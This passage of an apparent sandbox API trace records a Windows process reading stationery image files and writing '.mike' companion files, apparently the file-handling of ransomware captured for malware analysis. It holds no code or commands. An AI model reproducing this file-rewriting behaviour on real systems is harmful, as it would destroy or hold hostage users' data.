Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", lpFilePart=0x0) returned 0x4d [0053.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0053.616] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0053.616] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x48 [0053.616] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x48 [0053.616] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x48 [0053.616] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", lpFilePart=0x0) returned 0x4d [0053.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0053.616] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0053.616] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", lpFilePart=0x0) returned 0x4d [0053.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.616] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.617] GetFileType (hFile=0x288) returned 0x1 [0053.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.617] GetFileType (hFile=0x288) returned 0x1 [0053.617] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.617] WriteFile (in: hFile=0x288, lpBuffer=0x216c64c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x216c64c*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0053.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0053.618] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), fInfoLevelId=0x0, lpFileInformation=0x216c140 | out: lpFileInformation=0x216c140*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa45cbf3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x107e)) returned 1 [0053.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0053.618] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x48 [0053.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0053.618] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.618] GetFileType (hFile=0x288) returned 0x1 [0053.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0053.618] GetFileType (hFile=0x288) returned 0x1 [0053.618] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.618] ReadFile (in: hFile=0x288, lpBuffer=0x216d780, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x216d780*, lpNumberOfBytesRead=0x2af0c8*=0x107e, lpOverlapped=0x0) returned 1 [0053.620] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", lpFilePart=0x0) returned 0x4d [0053.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.620] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.620] GetFileType (hFile=0x288) returned 0x1 [0053.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.621] GetFileType (hFile=0x288) returned 0x1 [0053.621] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.621] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", lpFilePart=0x0) returned 0x4d [0053.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0053.621] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.621] GetFileType (hFile=0x288) returned 0x1 [0053.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0053.621] GetFileType (hFile=0x288) returned 0x1 [0053.622] WriteFile (in: hFile=0x288, lpBuffer=0x2178b3c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2178b3c*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0053.622] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x48 [0053.623] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", lpFilePart=0x0) returned 0x4d [0053.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0053.623] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe93f4dc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe93f4dc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe941af20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x12a0)) returned 1 [0053.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0053.623] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x48 [0053.623] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", lpFilePart=0x0) returned 0x4d [0053.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.623] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x217a2a0 | out: lpFileInformation=0x217a2a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe93f4dc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe93f4dc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe941af20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x12a0)) returned 1 [0053.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.623] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x48 [0053.623] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", dwFileAttributes=0x80) returned 0 [0053.624] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x48 [0053.624] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", lpFilePart=0x0) returned 0x4d [0053.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0053.624] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe93f4dc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe93f4dc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe941af20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x12a0)) returned 1 [0053.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0053.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpFilePart=0x0) returned 0x48 [0053.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike", lpFilePart=0x0) returned 0x4d [0053.625] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.mike")) returned 1 [0053.626] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf", lpFilePart=0x0) returned 0x42 [0053.626] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpFilePart=0x0) returned 0x43 [0053.626] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpFilePart=0x0) returned 0x43 [0053.626] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpFilePart=0x0) returned 0x43 [0053.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0053.627] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0053.628] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpFilePart=0x0) returned 0x43 [0053.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0053.628] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.629] GetFileType (hFile=0x288) returned 0x1 [0053.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0053.629] GetFileType (hFile=0x288) returned 0x1 [0053.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpFilePart=0x0) returned 0x43 [0053.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpFilePart=0x0) returned 0x43 [0053.629] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0053.629] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0053.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.629] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), fInfoLevelId=0x0, lpFileInformation=0x217f1ac | out: lpFileInformation=0x217f1ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4e4cd3a, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4e4cd3a, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44835973, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x8a1)) returned 1 [0053.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.630] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpFilePart=0x0) returned 0x43 [0053.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.630] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), fInfoLevelId=0x0, lpFileInformation=0x217f4b0 | out: lpFileInformation=0x217f4b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4e4cd3a, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4e4cd3a, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44835973, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x8a1)) returned 1 [0053.630] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.630] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpFilePart=0x0) returned 0x43 [0053.630] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", lpFilePart=0x0) returned 0x48 [0053.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0053.630] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.630] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0053.630] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpFilePart=0x0) returned 0x43 [0053.630] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpFilePart=0x0) returned 0x43 [0053.630] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpFilePart=0x0) returned 0x43 [0053.630] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", lpFilePart=0x0) returned 0x48 [0053.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0053.631] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0053.631] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", lpFilePart=0x0) returned 0x48 [0053.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.631] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.631] GetFileType (hFile=0x288) returned 0x1 [0053.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.631] GetFileType (hFile=0x288) returned 0x1 [0053.631] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.631] WriteFile (in: hFile=0x288, lpBuffer=0x2180298*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2180298*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0053.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0053.632] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), fInfoLevelId=0x0, lpFileInformation=0x217fdbc | out: lpFileInformation=0x217fdbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4e4cd3a, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4e4cd3a, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44835973, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x8a1)) returned 1 [0053.632] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0053.632] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpFilePart=0x0) returned 0x43 [0053.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0053.632] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.633] GetFileType (hFile=0x288) returned 0x1 [0053.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0053.633] GetFileType (hFile=0x288) returned 0x1 